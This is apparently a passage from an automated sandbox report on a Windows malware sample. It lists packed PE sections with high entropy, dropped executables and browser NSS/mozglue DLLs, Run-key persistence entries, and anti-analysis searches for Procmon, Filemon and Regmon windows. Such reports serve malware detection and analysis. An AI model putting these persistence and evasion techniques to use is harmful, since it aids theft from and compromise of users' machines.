                          Source: random[1].exe.6.drStatic PE information: section name: fprwnwoi
                          Source: random[1].exe.6.drStatic PE information: section name: .taggant
                          Source: 159c892ab5.exe.6.drStatic PE information: section name:
                          Source: 159c892ab5.exe.6.drStatic PE information: section name: .rsrc
                          Source: 159c892ab5.exe.6.drStatic PE information: section name: .idata
                          Source: 159c892ab5.exe.6.drStatic PE information: section name:
                          Source: 159c892ab5.exe.6.drStatic PE information: section name: odbfcxsw
                          Source: 159c892ab5.exe.6.drStatic PE information: section name: fprwnwoi
                          Source: 159c892ab5.exe.6.drStatic PE information: section name: .taggant
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: .idata
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: waxfszwi
                          Source: random[1].exe0.6.drStatic PE information: section name: civszaqm
                          Source: random[1].exe0.6.drStatic PE information: section name: .taggant
                          Source: 7b9f3f6834.exe.6.drStatic PE information: section name:
                          Source: 7b9f3f6834.exe.6.drStatic PE information: section name: .idata
                          Source: 7b9f3f6834.exe.6.drStatic PE information: section name:
                          Source: 7b9f3f6834.exe.6.drStatic PE information: section name: waxfszwi
                          Source: 7b9f3f6834.exe.6.drStatic PE information: section name: civszaqm
                          Source: 7b9f3f6834.exe.6.drStatic PE information: section name: .taggant
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: random[1].exe1.6.drStatic PE information: section name: .idata
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: random[1].exe1.6.drStatic PE information: section name: swacraub
                          Source: random[1].exe1.6.drStatic PE information: section name: agtryioj
                          Source: random[1].exe1.6.drStatic PE information: section name: .taggant
                          Source: a78a39a396.exe.6.drStatic PE information: section name:
                          Source: a78a39a396.exe.6.drStatic PE information: section name: .idata
                          Source: a78a39a396.exe.6.drStatic PE information: section name:
                          Source: a78a39a396.exe.6.drStatic PE information: section name: swacraub
                          Source: a78a39a396.exe.6.drStatic PE information: section name: agtryioj
                          Source: a78a39a396.exe.6.drStatic PE information: section name: .taggant
                          Source: random[2].exe.6.drStatic PE information: section name:
                          Source: random[2].exe.6.drStatic PE information: section name: .idata
                          Source: random[2].exe.6.drStatic PE information: section name: cpzpcpnh
                          Source: random[2].exe.6.drStatic PE information: section name: ghvclarm
                          Source: random[2].exe.6.drStatic PE information: section name: .taggant
                          Source: 76dd304e1d.exe.6.drStatic PE information: section name:
                          Source: 76dd304e1d.exe.6.drStatic PE information: section name: .idata
                          Source: 76dd304e1d.exe.6.drStatic PE information: section name: cpzpcpnh
                          Source: 76dd304e1d.exe.6.drStatic PE information: section name: ghvclarm
                          Source: 76dd304e1d.exe.6.drStatic PE information: section name: .taggant
                          Source: service123.exe.8.drStatic PE information: section name: .eh_fram
                          Source: freebl3.dll.10.drStatic PE information: section name: .00cfg
                          Source: freebl3[1].dll.10.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.10.drStatic PE information: section name: .00cfg
                          Source: mozglue[1].dll.10.drStatic PE information: section name: .00cfg
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: section name:
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: section name: .idata
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: section name:
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: section name: zbdrpywl
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: section name: dwhjapcc
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: section name: .taggant
                          Source: random[2].exe.10.drStatic PE information: section name:
                          Source: random[2].exe.10.drStatic PE information: section name: .idata
                          Source: random[2].exe.10.drStatic PE information: section name:
                          Source: random[2].exe.10.drStatic PE information: section name: zbdrpywl
                          Source: random[2].exe.10.drStatic PE information: section name: dwhjapcc
                          Source: random[2].exe.10.drStatic PE information: section name: .taggant
                          Source: msvcp140.dll.10.drStatic PE information: section name: .didat
                          Source: msvcp140[1].dll.10.drStatic PE information: section name: .didat
                          Source: nss3.dll.10.drStatic PE information: section name: .00cfg
                          Source: nss3[1].dll.10.drStatic PE information: section name: .00cfg
                          Source: softokn3.dll.10.drStatic PE information: section name: .00cfg
                          Source: softokn3[1].dll.10.drStatic PE information: section name: .00cfg
                          Source: gmpopenh264.dll.tmp.48.drStatic PE information: section name: .rodata
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF6A push edi; ret 9_3_0170BF6B
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF6A push edi; ret 9_3_0170BF6B
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF6A push edi; ret 9_3_0170BF6B
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF6A push edi; ret 9_3_0170BF6B
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF6A push edi; ret 9_3_0170BF6B
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF6A push edi; ret 9_3_0170BF6B
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF6A push edi; ret 9_3_0170BF6B
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170CF90 pushad ; iretd 9_3_0170CF91
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170CF90 pushad ; iretd 9_3_0170CF91
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170CF90 pushad ; iretd 9_3_0170CF91
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170CF90 pushad ; iretd 9_3_0170CF91
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170CF90 pushad ; iretd 9_3_0170CF91
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170CF90 pushad ; iretd 9_3_0170CF91
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170CF90 pushad ; iretd 9_3_0170CF91
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF82 push esp; ret 9_3_0170BF83
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF82 push esp; ret 9_3_0170BF83
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF82 push esp; ret 9_3_0170BF83
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF82 push esp; ret 9_3_0170BF83
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF82 push esp; ret 9_3_0170BF83
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF82 push esp; ret 9_3_0170BF83
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF82 push esp; ret 9_3_0170BF83
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170E7E3 push edi; iretd 9_3_0170E7E4
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170E7E3 push edi; iretd 9_3_0170E7E4
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170E7E3 push edi; iretd 9_3_0170E7E4
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170E7E3 push edi; iretd 9_3_0170E7E4
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170E7E3 push edi; iretd 9_3_0170E7E4
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170E7E3 push edi; iretd 9_3_0170E7E4
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF6A push edi; ret 9_3_0170BF6B
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF6A push edi; ret 9_3_0170BF6B
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF6A push edi; ret 9_3_0170BF6B
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeCode function: 9_3_0170BF6A push edi; ret 9_3_0170BF6B
                          Source: file.exeStatic PE information: section name: entropy: 7.974028691788296
                          Source: file.exeStatic PE information: section name: zbdrpywl entropy: 7.953452652594506
                          Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.974028691788296
                          Source: skotes.exe.0.drStatic PE information: section name: zbdrpywl entropy: 7.953452652594506
                          Source: random[1].exe.6.drStatic PE information: section name: odbfcxsw entropy: 7.955887099329246
                          Source: 159c892ab5.exe.6.drStatic PE information: section name: odbfcxsw entropy: 7.955887099329246
                          Source: random[1].exe0.6.drStatic PE information: section name: entropy: 7.976140339035255
                          Source: random[1].exe0.6.drStatic PE information: section name: waxfszwi entropy: 7.95397506828024
                          Source: 7b9f3f6834.exe.6.drStatic PE information: section name: entropy: 7.976140339035255
                          Source: 7b9f3f6834.exe.6.drStatic PE information: section name: waxfszwi entropy: 7.95397506828024
                          Source: random[1].exe1.6.drStatic PE information: section name: swacraub entropy: 7.953860703980493
                          Source: a78a39a396.exe.6.drStatic PE information: section name: swacraub entropy: 7.953860703980493
                          Source: random[2].exe.6.drStatic PE information: section name: entropy: 7.819456741402339
                          Source: 76dd304e1d.exe.6.drStatic PE information: section name: entropy: 7.819456741402339
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: section name: entropy: 7.974028691788296
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: section name: zbdrpywl entropy: 7.953452652594506
                          Source: random[2].exe.10.drStatic PE information: section name: entropy: 7.974028691788296
                          Source: random[2].exe.10.drStatic PE information: section name: zbdrpywl entropy: 7.953452652594506

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\Users\user\DocumentsCFCGIIEHIE.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\Users\user\DocumentsCFCGIIEHIE.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeJump to dropped file
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile created: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\Users\user\DocumentsCFCGIIEHIE.exeJump to dropped file

                          Boot Survival

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aca7749dee.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 76dd304e1d.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7b9f3f6834.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a78a39a396.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile created: C:\Users\user\DocumentsCFCGIIEHIE.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: Filemonclass
